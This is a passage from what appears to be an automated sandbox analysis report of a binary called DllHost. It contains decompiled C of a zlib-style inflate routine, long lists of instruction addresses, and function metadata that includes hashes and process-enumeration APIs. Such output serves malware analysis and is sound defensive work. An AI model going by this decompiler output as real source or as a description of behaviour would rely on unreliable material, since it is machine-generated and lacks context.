				 *(_t797 + 0xb8) = r10d;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f48;
				goto 0x191ce001;
				if ( *((intOrPtr*)(_t795 + 0x10)) == 0) goto 0x191cee56;
				if (_t422 - 0x20 >= 0) goto 0x191ced9e;
				if (_t596 == 0) goto 0x191ce19f;
				_t597 = _t596 - 1;
				_t631 = _t630 + (( *_t791 & 0x000000ff) << _t422);
				_t792 =  &(_t791[1]);
				if (_t422 + 8 - 0x20 < 0) goto 0x191ced80;
				r8d = r8d - r10d;
				 *((intOrPtr*)(_t811 + 0x1c)) =  *((intOrPtr*)(_t811 + 0x1c)) + r8d;
				 *((intOrPtr*)(__r13 + 0x24)) =  *((intOrPtr*)(__r13 + 0x24)) + r8d;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x191cedec;
				if (r8d == 0) goto 0x191cedec;
				if ( *((intOrPtr*)(__r13 + 0x18)) == 0) goto 0x191cedd2;
				E00007FF77FF7191CF4C0(_t806 - _t754);
				goto 0x191cedd7;
				_t376 = E00007FF77FF7191CF7F0( *(__r13 + 0x20), _t754, _t806 - _t754, _t799, _t806);
				r10d =  *(_t797 + 0xb8);
				 *(__r13 + 0x20) = _t376;
				 *(_t811 + 0x4c) = _t376;
				 *(_t797 + 0xa0) = r10d;
				r14d = r10d;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x191cee46;
				if ( *((intOrPtr*)(__r13 + 0x18)) != 0) goto 0x191cee27;
				if (((_t630 + (( *_t791 & 0x000000ff) << _t422) & 0x0000ff00) + (_t630 + (( *_t791 & 0x000000ff) << _t422) << 0x10) << 8) + (_t631 >> 0x00000008 & 0x0000ff00) + (_t631 >> 0x18) ==  *(__r13 + 0x20)) goto 0x191cee46;
				 *(_t811 + 0x20) = "incorrect data check";
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x191cdffc;
				_t632 = r15d;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f4f;
				_t424 = r15d;
				goto 0x191cee70;
				r14d =  *(_t797 + 0xa0);
				 *((intOrPtr*)(__r13 + 8)) = 0x3f4f;
				r14d =  *(_t797 + 0xa0);
				if ( *(__r13 + 0x10) == 0) goto 0x191ceeeb;
				if ( *((intOrPtr*)(__r13 + 0x18)) == 0) goto 0x191ceeeb;
				if (_t424 - 0x20 >= 0) goto 0x191ceea1;
				if (_t597 == 0) goto 0x191ce1a7;
				_t633 = _t632 + (( *_t792 & 0x000000ff) << _t424);
				_t425 = _t424 + 8;
				if (_t425 - 0x20 < 0) goto 0x191cee83;
				if (_t633 ==  *((intOrPtr*)(__r13 + 0x24))) goto 0x191ceee5;
				_t756 = "incorrect length check";
				 *(_t811 + 0x20) = "incorrect length check";
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x191cdffc;
				 *((long long*)(_t811 + 0x10)) = _t806;
				 *(_t811 + 0x18) = r10d;
				 *_t811 =  &(_t792[1]);
				 *((intOrPtr*)(_t811 + 8)) = _t597 - 1;
				 *(__r13 + 0x48) = _t633;
				 *(__r13 + 0x4c) = _t425;
				goto 0x191cf00a;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f50;
				r15d = 1;
				r14d =  *(_t797 + 0xa0);
				r15d = 1;
				r14d =  *(_t797 + 0xa0);
				r15d = 0xfffffffd;
				goto 0x191ce1af;
				r14d =  *(_t797 + 0xa0);
				goto 0x191ce1b6;
				r14d = r14d -  *(_t811 + 0x18);
				r10d =  *(_t797 + 0x38);
				r10d = r10d -  *((intOrPtr*)(_t811 + 8));
				 *((intOrPtr*)(_t811 + 0xc)) =  *((intOrPtr*)(_t811 + 0xc)) + r10d;
				 *((intOrPtr*)(_t811 + 0x1c)) =  *((intOrPtr*)(_t811 + 0x1c)) + r14d;
				 *((intOrPtr*)(__r13 + 0x24)) =  *((intOrPtr*)(__r13 + 0x24)) + r14d;
				 *(_t797 + 0x38) = r10d;
				if (( *(__r13 + 0x10) & 0x00000004) == 0) goto 0x191cef92;
				if (r14d == 0) goto 0x191cef92;
				r8d = r14d;
				_t541 =  *(__r13 + 0x20);
				if ( *((intOrPtr*)(__r13 + 0x18)) == 0) goto 0x191cef7f;
				E00007FF77FF7191CF4C0( *((intOrPtr*)(_t811 + 0x10)) - _t756);
				goto 0x191cef84;
				_t390 = E00007FF77FF7191CF7F0(_t541, _t756,  *((intOrPtr*)(_t811 + 0x10)) - _t756, _t799, _t806);
				r10d =  *(_t797 + 0x38);
				 *(__r13 + 0x20) = _t390;
				 *(_t811 + 0x4c) = _t390;
				_t582 =  *((intOrPtr*)(__r13 + 8));
				if (_t582 == 0x3f47) goto 0x191cefae;
				if (_t582 == 0x3f42) goto 0x191cefae;
				r9d = 0;
				r8d = r9d;
				goto 0x191cefb7;
				r8d = 0x100;
				r9d = 0;
				asm("sbb ecx, ecx");
				r9d =  ==  ? 0x80 : r9d;
				 *((intOrPtr*)(_t811 + 0x48)) = (_t541 & 0x00000040) + r9d +  *(__r13 + 0x4c) + r8d;
				if (r10d != 0) goto 0x191cefea;
				if (r14d == 0) goto 0x191ceff4;
				if ( *((intOrPtr*)(_t797 + 0xa8)) != 4) goto 0x191cf000;
				r15d =  ==  ? 0xfffffffb : r15d;
				goto 0x191cf00a;
				return 0xfffffffe;
			}




































































































































                                                                                                                                                              0x7ff7191ce338
                                                                                                                                                              0x7ff7191ce338
                                                                                                                                                              0x7ff7191ce338
                                                                                                                                                              0x7ff7191ce33b
                                                                                                                                                              0x7ff7191ce342
                                                                                                                                                              0x7ff7191ce34f
                                                                                                                                                              0x7ff7191ce351
                                                                                                                                                              0x7ff7191ce353
                                                                                                                                                              0x7ff7191ce356
                                                                                                                                                              0x7ff7191ce35c
                                                                                                                                                              0x7ff7191ce360
                                                                                                                                                              0x7ff7191ce363
                                                                                                                                                              0x7ff7191ce36b
                                                                                                                                                              0x7ff7191ce371
                                                                                                                                                              0x7ff7191ce379
                                                                                                                                                              0x7ff7191ce386
                                                                                                                                                              0x7ff7191ce388
                                                                                                                                                              0x7ff7191ce38f
                                                                                                                                                              0x7ff7191ce399
                                                                                                                                                              0x7ff7191ce3a2
                                                                                                                                                              0x7ff7191ce3a8
                                                                                                                                                              0x7ff7191ce3af
                                                                                                                                                              0x7ff7191ce3c2
                                                                                                                                                              0x7ff7191ce3c7
                                                                                                                                                              0x7ff7191ce3d2
                                                                                                                                                              0x7ff7191ce3df
                                                                                                                                                              0x7ff7191ce3e1
                                                                                                                                                              0x7ff7191ce3e3
                                                                                                                                                              0x7ff7191ce3e6
                                                                                                                                                              0x7ff7191ce3ec
                                                                                                                                                              0x7ff7191ce3ff
                                                                                                                                                              0x7ff7191ce40b
                                                                                                                                                              0x7ff7191ce414
                                                                                                                                                              0x7ff7191ce41b
                                                                                                                                                              0x7ff7191ce426
                                                                                                                                                              0x7ff7191ce42b
                                                                                                                                                              0x7ff7191ce440
                                                                                                                                                              0x7ff7191ce449
                                                                                                                                                              0x7ff7191ce458
                                                                                                                                                              0x7ff7191ce45a
                                                                                                                                                              0x7ff7191ce45e
                                                                                                                                                              0x7ff7191ce465
                                                                                                                                                              0x7ff7191ce472
                                                                                                                                                              0x7ff7191ce476
                                                                                                                                                              0x7ff7191ce487
                                                                                                                                                              0x7ff7191ce48c
                                                                                                                                                              0x7ff7191ce493
                                                                                                                                                              0x7ff7191ce493
                                                                                                                                                              0x7ff7191ce497
                                                                                                                                                              0x7ff7191ce49c
                                                                                                                                                              0x7ff7191ce4a5
                                                                                                                                                              0x7ff7191ce4ae
                                                                                                                                                              0x7ff7191ce4b3
                                                                                                                                                              0x7ff7191ce4bb
                                                                                                                                                              0x7ff7191ce4c0
                                                                                                                                                              0x7ff7191ce4c7
                                                                                                                                                              0x7ff7191ce4cc
                                                                                                                                                              0x7ff7191ce4d4
                                                                                                                                                              0x7ff7191ce4d9
                                                                                                                                                              0x7ff7191ce4e5
                                                                                                                                                              0x7ff7191ce4f4
                                                                                                                                                              0x7ff7191ce502
                                                                                                                                                              0x7ff7191ce514
                                                                                                                                                              0x7ff7191ce51a
                                                                                                                                                              0x7ff7191ce51e
                                                                                                                                                              0x7ff7191ce521
                                                                                                                                                              0x7ff7191ce529
                                                                                                                                                              0x7ff7191ce52c
                                                                                                                                                              0x7ff7191ce535
                                                                                                                                                              0x7ff7191ce53b
                                                                                                                                                              0x7ff7191ce53f
                                                                                                                                                              0x7ff7191ce545
                                                                                                                                                              0x7ff7191ce549
                                                                                                                                                              0x7ff7191ce556
                                                                                                                                                              0x7ff7191ce55a
                                                                                                                                                              0x7ff7191ce55f
                                                                                                                                                              0x7ff7191ce565
                                                                                                                                                              0x7ff7191ce568
                                                                                                                                                              0x7ff7191ce56e
                                                                                                                                                              0x7ff7191ce571
                                                                                                                                                              0x7ff7191ce577
                                                                                                                                                              0x7ff7191ce57b
                                                                                                                                                              0x7ff7191ce581
                                                                                                                                                              0x7ff7191ce583
                                                                                                                                                              0x7ff7191ce588
                                                                                                                                                              0x7ff7191ce595
                                                                                                                                                              0x7ff7191ce59e
                                                                                                                                                              0x7ff7191ce5a7
                                                                                                                                                              0x7ff7191ce5ae
                                                                                                                                                              0x7ff7191ce5b5
                                                                                                                                                              0x7ff7191ce5bd
                                                                                                                                                              0x7ff7191ce5bf
                                                                                                                                                              0x7ff7191ce5c4
                                                                                                                                                              0x7ff7191ce5c8
                                                                                                                                                              0x7ff7191ce5d5
                                                                                                                                                              0x7ff7191ce5d9
                                                                                                                                                              0x7ff7191ce5dc
                                                                                                                                                              0x7ff7191ce5e1
                                                                                                                                                              0x7ff7191ce5e3
                                                                                                                                                              0x7ff7191ce5f1
                                                                                                                                                              0x7ff7191ce5f5
                                                                                                                                                              0x7ff7191ce5fd
                                                                                                                                                              0x7ff7191ce60b
                                                                                                                                                              0x7ff7191ce614
                                                                                                                                                              0x7ff7191ce61e
                                                                                                                                                              0x7ff7191ce620
                                                                                                                                                              0x7ff7191ce625
                                                                                                                                                              0x7ff7191ce629
                                                                                                                                                              0x7ff7191ce636
                                                                                                                                                              0x7ff7191ce63a
                                                                                                                                                              0x7ff7191ce63d
                                                                                                                                                              0x7ff7191ce642
                                                                                                                                                              0x7ff7191ce64e
                                                                                                                                                              0x7ff7191ce650
                                                                                                                                                              0x7ff7191ce65e
                                                                                                                                                              0x7ff7191ce660
                                                                                                                                                              0x7ff7191ce665
                                                                                                                                                              0x7ff7191ce669
                                                                                                                                                              0x7ff7191ce676
                                                                                                                                                              0x7ff7191ce67d
                                                                                                                                                              0x7ff7191ce682
                                                                                                                                                              0x7ff7191ce684
                                                                                                                                                              0x7ff7191ce68e
                                                                                                                                                              0x7ff7191ce690
                                                                                                                                                              0x7ff7191ce6b7
                                                                                                                                                              0x7ff7191ce6b9
                                                                                                                                                              0x7ff7191ce6c7
                                                                                                                                                              0x7ff7191ce6d0
                                                                                                                                                              0x7ff7191ce6d7
                                                                                                                                                              0x7ff7191ce6db
                                                                                                                                                              0x7ff7191ce6e5
                                                                                                                                                              0x7ff7191ce6ee
                                                                                                                                                              0x7ff7191ce6f8
                                                                                                                                                              0x7ff7191ce708
                                                                                                                                                              0x7ff7191ce717
                                                                                                                                                              0x7ff7191ce720
                                                                                                                                                              0x7ff7191ce725
                                                                                                                                                              0x7ff7191ce72d
                                                                                                                                                              0x7ff7191ce739
                                                                                                                                                              0x7ff7191ce73e
                                                                                                                                                              0x7ff7191ce746
                                                                                                                                                              0x7ff7191ce74b
                                                                                                                                                              0x7ff7191ce752
                                                                                                                                                              0x7ff7191ce75a
                                                                                                                                                              0x7ff7191ce761
                                                                                                                                                              0x7ff7191ce768
                                                                                                                                                              0x7ff7191ce777
                                                                                                                                                              0x7ff7191ce783
                                                                                                                                                              0x7ff7191ce788
                                                                                                                                                              0x7ff7191ce790
                                                                                                                                                              0x7ff7191ce795
                                                                                                                                                              0x7ff7191ce79e
                                                                                                                                                              0x7ff7191ce7a7
                                                                                                                                                              0x7ff7191ce7ac
                                                                                                                                                              0x7ff7191ce7b4
                                                                                                                                                              0x7ff7191ce7b9
                                                                                                                                                              0x7ff7191ce7c0
                                                                                                                                                              0x7ff7191ce7c4
                                                                                                                                                              0x7ff7191ce7d2
                                                                                                                                                              0x7ff7191ce7da
                                                                                                                                                              0x7ff7191ce7e0
                                                                                                                                                              0x7ff7191ce7e5
                                                                                                                                                              0x7ff7191ce7fa
                                                                                                                                                              0x7ff7191ce7ff
                                                                                                                                                              0x7ff7191ce806
                                                                                                                                                              0x7ff7191ce80b
                                                                                                                                                              0x7ff7191ce80d
                                                                                                                                                              0x7ff7191ce814
                                                                                                                                                              0x7ff7191ce819
                                                                                                                                                              0x7ff7191ce821
                                                                                                                                                              0x7ff7191ce82d
                                                                                                                                                              0x7ff7191ce838
                                                                                                                                                              0x7ff7191ce83e
                                                                                                                                                              0x7ff7191ce846
                                                                                                                                                              0x7ff7191ce849
                                                                                                                                                              0x7ff7191ce851
                                                                                                                                                              0x7ff7191ce85c
                                                                                                                                                              0x7ff7191ce865
                                                                                                                                                              0x7ff7191ce86f
                                                                                                                                                              0x7ff7191ce874
                                                                                                                                                              0x7ff7191ce877
                                                                                                                                                              0x7ff7191ce87c
                                                                                                                                                              0x7ff7191ce880
                                                                                                                                                              0x7ff7191ce885
                                                                                                                                                              0x7ff7191ce889
                                                                                                                                                              0x7ff7191ce88d
                                                                                                                                                              0x7ff7191ce89f
                                                                                                                                                              0x7ff7191ce8a4
                                                                                                                                                              0x7ff7191ce8a8
                                                                                                                                                              0x7ff7191ce8b1
                                                                                                                                                              0x7ff7191ce8b5
                                                                                                                                                              0x7ff7191ce8ba
                                                                                                                                                              0x7ff7191ce8c2
                                                                                                                                                              0x7ff7191ce8c8
                                                                                                                                                              0x7ff7191ce8d3
                                                                                                                                                              0x7ff7191ce8e1
                                                                                                                                                              0x7ff7191ce8ed
                                                                                                                                                              0x7ff7191ce8f0
                                                                                                                                                              0x7ff7191ce905
                                                                                                                                                              0x7ff7191ce909
                                                                                                                                                              0x7ff7191ce916
                                                                                                                                                              0x7ff7191ce918
                                                                                                                                                              0x7ff7191ce91a
                                                                                                                                                              0x7ff7191ce91f
                                                                                                                                                              0x7ff7191ce927
                                                                                                                                                              0x7ff7191ce935
                                                                                                                                                              0x7ff7191ce939
                                                                                                                                                              0x7ff7191ce941
                                                                                                                                                              0x7ff7191ce949
                                                                                                                                                              0x7ff7191ce94d
                                                                                                                                                              0x7ff7191ce953
                                                                                                                                                              0x7ff7191ce95e
                                                                                                                                                              0x7ff7191ce96b
                                                                                                                                                              0x7ff7191ce971
                                                                                                                                                              0x7ff7191ce974
                                                                                                                                                              0x7ff7191ce977
                                                                                                                                                              0x7ff7191ce97a
                                                                                                                                                              0x7ff7191ce986
                                                                                                                                                              0x7ff7191ce98a
                                                                                                                                                              0x7ff7191ce990
                                                                                                                                                              0x7ff7191ce992
                                                                                                                                                              0x7ff7191ce99a
                                                                                                                                                              0x7ff7191ce9a7
                                                                                                                                                              0x7ff7191ce9ad
                                                                                                                                                              0x7ff7191ce9b5
                                                                                                                                                              0x7ff7191ce9b7
                                                                                                                                                              0x7ff7191ce9ba
                                                                                                                                                              0x7ff7191ce9bd
                                                                                                                                                              0x7ff7191ce9c3
                                                                                                                                                              0x7ff7191ce9c6
                                                                                                                                                              0x7ff7191ce9c9
                                                                                                                                                              0x7ff7191ce9cc
                                                                                                                                                              0x7ff7191ce9cf
                                                                                                                                                              0x7ff7191ce9d8
                                                                                                                                                              0x7ff7191ce9dc
                                                                                                                                                              0x7ff7191ce9e2
                                                                                                                                                              0x7ff7191ce9e4
                                                                                                                                                              0x7ff7191ce9ec
                                                                                                                                                              0x7ff7191ce9f8
                                                                                                                                                              0x7ff7191ce9fb
                                                                                                                                                              0x7ff7191cea02
                                                                                                                                                              0x7ff7191cea0b
                                                                                                                                                              0x7ff7191cea11
                                                                                                                                                              0x7ff7191cea13
                                                                                                                                                              0x7ff7191cea1b
                                                                                                                                                              0x7ff7191cea22
                                                                                                                                                              0x7ff7191cea24
                                                                                                                                                              0x7ff7191cea2f
                                                                                                                                                              0x7ff7191cea36
                                                                                                                                                              0x7ff7191cea38
                                                                                                                                                              0x7ff7191cea3f
                                                                                                                                                              0x7ff7191cea44
                                                                                                                                                              0x7ff7191cea4c
                                                                                                                                                              0x7ff7191cea57
                                                                                                                                                              0x7ff7191cea5f
                                                                                                                                                              0x7ff7191cea63
                                                                                                                                                              0x7ff7191cea69
                                                                                                                                                              0x7ff7191cea6d
                                                                                                                                                              0x7ff7191cea72
                                                                                                                                                              0x7ff7191cea7f
                                                                                                                                                              0x7ff7191cea81
                                                                                                                                                              0x7ff7191cea83
                                                                                                                                                              0x7ff7191cea86
                                                                                                                                                              0x7ff7191cea8b
                                                                                                                                                              0x7ff7191cea8d
                                                                                                                                                              0x7ff7191cea96
                                                                                                                                                              0x7ff7191cea9e
                                                                                                                                                              0x7ff7191ceaa2
                                                                                                                                                              0x7ff7191ceaad
                                                                                                                                                              0x7ff7191ceab4
                                                                                                                                                              0x7ff7191ceac5
                                                                                                                                                              0x7ff7191cead1
                                                                                                                                                              0x7ff7191ceae2
                                                                                                                                                              0x7ff7191ceae6
                                                                                                                                                              0x7ff7191ceaf3
                                                                                                                                                              0x7ff7191ceaf5
                                                                                                                                                              0x7ff7191ceaf7
                                                                                                                                                              0x7ff7191ceafc
                                                                                                                                                              0x7ff7191ceb04
                                                                                                                                                              0x7ff7191ceb12
                                                                                                                                                              0x7ff7191ceb16
                                                                                                                                                              0x7ff7191ceb1e
                                                                                                                                                              0x7ff7191ceb22
                                                                                                                                                              0x7ff7191ceb28
                                                                                                                                                              0x7ff7191ceb33
                                                                                                                                                              0x7ff7191ceb40
                                                                                                                                                              0x7ff7191ceb46
                                                                                                                                                              0x7ff7191ceb49
                                                                                                                                                              0x7ff7191ceb4c
                                                                                                                                                              0x7ff7191ceb4f
                                                                                                                                                              0x7ff7191ceb5b
                                                                                                                                                              0x7ff7191ceb5f
                                                                                                                                                              0x7ff7191ceb65
                                                                                                                                                              0x7ff7191ceb67
                                                                                                                                                              0x7ff7191ceb72
                                                                                                                                                              0x7ff7191ceb7f
                                                                                                                                                              0x7ff7191ceb85
                                                                                                                                                              0x7ff7191ceb8d
                                                                                                                                                              0x7ff7191ceb8f
                                                                                                                                                              0x7ff7191ceb92
                                                                                                                                                              0x7ff7191ceb95
                                                                                                                                                              0x7ff7191ceb9b
                                                                                                                                                              0x7ff7191ceb9e
                                                                                                                                                              0x7ff7191ceba1
                                                                                                                                                              0x7ff7191ceba4
                                                                                                                                                              0x7ff7191ceba7
                                                                                                                                                              0x7ff7191cebb0
                                                                                                                                                              0x7ff7191cebb4
                                                                                                                                                              0x7ff7191cebba
                                                                                                                                                              0x7ff7191cebbc
                                                                                                                                                              0x7ff7191cebc4
                                                                                                                                                              0x7ff7191cebcb
                                                                                                                                                              0x7ff7191cebd8
                                                                                                                                                              0x7ff7191cebdb
                                                                                                                                                              0x7ff7191cebe2
                                                                                                                                                              0x7ff7191cebe8
                                                                                                                                                              0x7ff7191cebf1
                                                                                                                                                              0x7ff7191cebf6
                                                                                                                                                              0x7ff7191cebfe
                                                                                                                                                              0x7ff7191cec03
                                                                                                                                                              0x7ff7191cec10
                                                                                                                                                              0x7ff7191cec1a
                                                                                                                                                              0x7ff7191cec22
                                                                                                                                                              0x7ff7191cec26
                                                                                                                                                              0x7ff7191cec2c
                                                                                                                                                              0x7ff7191cec30
                                                                                                                                                              0x7ff7191cec34
                                                                                                                                                              0x7ff7191cec41
                                                                                                                                                              0x7ff7191cec43
                                                                                                                                                              0x7ff7191cec45
                                                                                                                                                              0x7ff7191cec48
                                                                                                                                                              0x7ff7191cec4d
                                                                                                                                                              0x7ff7191cec4f
                                                                                                                                                              0x7ff7191cec58
                                                                                                                                                              0x7ff7191cec5e
                                                                                                                                                              0x7ff7191cec60
                                                                                                                                                              0x7ff7191cec64
                                                                                                                                                              0x7ff7191cec6b
                                                                                                                                                              0x7ff7191cec76
                                                                                                                                                              0x7ff7191cec7c
                                                                                                                                                              0x7ff7191cec83
                                                                                                                                                              0x7ff7191cec88
                                                                                                                                                              0x7ff7191cec8a
                                                                                                                                                              0x7ff7191cec90
                                                                                                                                                              0x7ff7191cec9a
                                                                                                                                                              0x7ff7191cec9c
                                                                                                                                                              0x7ff7191ceca3
                                                                                                                                                              0x7ff7191ceca8
                                                                                                                                                              0x7ff7191cecb0
                                                                                                                                                              0x7ff7191cecb5
                                                                                                                                                              0x7ff7191cecbb
                                                                                                                                                              0x7ff7191cecc3
                                                                                                                                                              0x7ff7191ceccb
                                                                                                                                                              0x7ff7191cecd5
                                                                                                                                                              0x7ff7191cecd9
                                                                                                                                                              0x7ff7191cece0
                                                                                                                                                              0x7ff7191cece7
                                                                                                                                                              0x7ff7191cecf0
                                                                                                                                                              0x7ff7191cecf4
                                                                                                                                                              0x7ff7191cecf9
                                                                                                                                                              0x7ff7191cecfc
                                                                                                                                                              0x7ff7191cecff
                                                                                                                                                              0x7ff7191ced0a
                                                                                                                                                              0x7ff7191ced15
                                                                                                                                                              0x7ff7191ced18
                                                                                                                                                              0x7ff7191ced1e
                                                                                                                                                              0x7ff7191ced20
                                                                                                                                                              0x7ff7191ced29
                                                                                                                                                              0x7ff7191ced2f
                                                                                                                                                              0x7ff7191ced3f
                                                                                                                                                              0x7ff7191ced4a
                                                                                                                                                              0x7ff7191ced4d
                                                                                                                                                              0x7ff7191ced50
                                                                                                                                                              0x7ff7191ced53
                                                                                                                                                              0x7ff7191ced58
                                                                                                                                                              0x7ff7191ced60
                                                                                                                                                              0x7ff7191ced68
                                                                                                                                                              0x7ff7191ced72
                                                                                                                                                              0x7ff7191ced7b
                                                                                                                                                              0x7ff7191ced82
                                                                                                                                                              0x7ff7191ced8f
                                                                                                                                                              0x7ff7191ced91
                                                                                                                                                              0x7ff7191ced93
                                                                                                                                                              0x7ff7191ced9c
                                                                                                                                                              0x7ff7191ced9e
                                                                                                                                                              0x7ff7191ceda1
                                                                                                                                                              0x7ff7191ceda6
                                                                                                                                                              0x7ff7191cedb0
                                                                                                                                                              0x7ff7191cedb5
                                                                                                                                                              0x7ff7191cedc9
                                                                                                                                                              0x7ff7191cedcb
                                                                                                                                                              0x7ff7191cedd0
                                                                                                                                                              0x7ff7191cedd2
                                                                                                                                                              0x7ff7191cedd7
                                                                                                                                                              0x7ff7191ceddf
                                                                                                                                                              0x7ff7191cede3
                                                                                                                                                              0x7ff7191cedec
                                                                                                                                                              0x7ff7191cedf4
                                                                                                                                                              0x7ff7191cedf9
                                                                                                                                                              0x7ff7191cee02
                                                                                                                                                              0x7ff7191cee2b
                                                                                                                                                              0x7ff7191cee34
                                                                                                                                                              0x7ff7191cee39
                                                                                                                                                              0x7ff7191cee41
                                                                                                                                                              0x7ff7191cee46
                                                                                                                                                              0x7ff7191cee49
                                                                                                                                                              0x7ff7191cee51
                                                                                                                                                              0x7ff7191cee54
                                                                                                                                                              0x7ff7191cee56
                                                                                                                                                              0x7ff7191cee5e
                                                                                                                                                              0x7ff7191cee68
                                                                                                                                                              0x7ff7191cee75
                                                                                                                                                              0x7ff7191cee7c
                                                                                                                                                              0x7ff7191cee81
                                                                                                                                                              0x7ff7191cee85
                                                                                                                                                              0x7ff7191cee94
                                                                                                                                                              0x7ff7191cee99
                                                                                                                                                              0x7ff7191cee9f
                                                                                                                                                              0x7ff7191ceea5
                                                                                                                                                              0x7ff7191ceea7
                                                                                                                                                              0x7ff7191ceeae
                                                                                                                                                              0x7ff7191ceeb3
                                                                                                                                                              0x7ff7191ceebb
                                                                                                                                                              0x7ff7191ceec0
                                                                                                                                                              0x7ff7191ceeca
                                                                                                                                                              0x7ff7191ceecf
                                                                                                                                                              0x7ff7191ceed3
                                                                                                                                                              0x7ff7191ceed8
                                                                                                                                                              0x7ff7191ceedc
                                                                                                                                                              0x7ff7191ceee0
                                                                                                                                                              0x7ff7191ceeeb
                                                                                                                                                              0x7ff7191ceef3
                                                                                                                                                              0x7ff7191ceefe
                                                                                                                                                              0x7ff7191cef06
                                                                                                                                                              0x7ff7191cef11
                                                                                                                                                              0x7ff7191cef19
                                                                                                                                                              0x7ff7191cef1f
                                                                                                                                                              0x7ff7191cef24
                                                                                                                                                              0x7ff7191cef2c
                                                                                                                                                              0x7ff7191cef31
                                                                                                                                                              0x7ff7191cef36
                                                                                                                                                              0x7ff7191cef3b
                                                                                                                                                              0x7ff7191cef40
                                                                                                                                                              0x7ff7191cef45
                                                                                                                                                              0x7ff7191cef4a
                                                                                                                                                              0x7ff7191cef53
                                                                                                                                                              0x7ff7191cef58
                                                                                                                                                              0x7ff7191cef5d
                                                                                                                                                              0x7ff7191cef64
                                                                                                                                                              0x7ff7191cef67
                                                                                                                                                              0x7ff7191cef76
                                                                                                                                                              0x7ff7191cef78
                                                                                                                                                              0x7ff7191cef7d
                                                                                                                                                              0x7ff7191cef7f
                                                                                                                                                              0x7ff7191cef84
                                                                                                                                                              0x7ff7191cef89
                                                                                                                                                              0x7ff7191cef8d
                                                                                                                                                              0x7ff7191cef92
                                                                                                                                                              0x7ff7191cef9c
                                                                                                                                                              0x7ff7191cefa4
                                                                                                                                                              0x7ff7191cefa6
                                                                                                                                                              0x7ff7191cefa9
                                                                                                                                                              0x7ff7191cefac
                                                                                                                                                              0x7ff7191cefae
                                                                                                                                                              0x7ff7191cefb4
                                                                                                                                                              0x7ff7191cefc2
                                                                                                                                                              0x7ff7191cefcd
                                                                                                                                                              0x7ff7191cefdb
                                                                                                                                                              0x7ff7191cefe3
                                                                                                                                                              0x7ff7191cefe8
                                                                                                                                                              0x7ff7191ceff2
                                                                                                                                                              0x7ff7191ceffc
                                                                                                                                                              0x7ff7191cf003
                                                                                                                                                              0x7ff7191cf01a

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                              • API String ID: 0-2665694366
                                                                                                                                                              • Opcode ID: 877371df32e23b1a979a63b1eef5757ed4616ed08677c783a71db166412a154e
                                                                                                                                                              • Instruction ID: 0b0c8062061d79ab12cd9d5244d9344814671bcd52e21f2fad2b28c9fc49491c
                                                                                                                                                              • Opcode Fuzzy Hash: 877371df32e23b1a979a63b1eef5757ed4616ed08677c783a71db166412a154e
                                                                                                                                                              • Instruction Fuzzy Hash: B5520772A24AA647E7949F14E448A7E77BDFB84314F814139E64A837C0DB3DEC89DB10
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191B5470 Relevance: 9.1, APIs: 6, Instructions: 53processCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Process32$Next$CloseCreateFirstHandleOpenProcessSnapshotToolhelp32_invalid_parameter_noinfo
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 729873580-0
                                                                                                                                                              • Opcode ID: 39cc5cf5ac709e53cc9a3a7ff97a1199afce99bb37955619f3a5a1c925ce8516
                                                                                                                                                              • Instruction ID: 21623d56a0bb1fe8e7a3f1627a9c34e7407896e0817b173629a8f5b8369a1738
                                                                                                                                                              • Opcode Fuzzy Hash: 39cc5cf5ac709e53cc9a3a7ff97a1199afce99bb37955619f3a5a1c925ce8516
                                                                                                                                                              • Instruction Fuzzy Hash: E6213332A08A4581FA24AF11F444669B7B6FB49BA8FC44131DE4E47754DF3CD58EDB10
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191CDB04 Relevance: 5.4, Strings: 4, Instructions: 399COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 70%
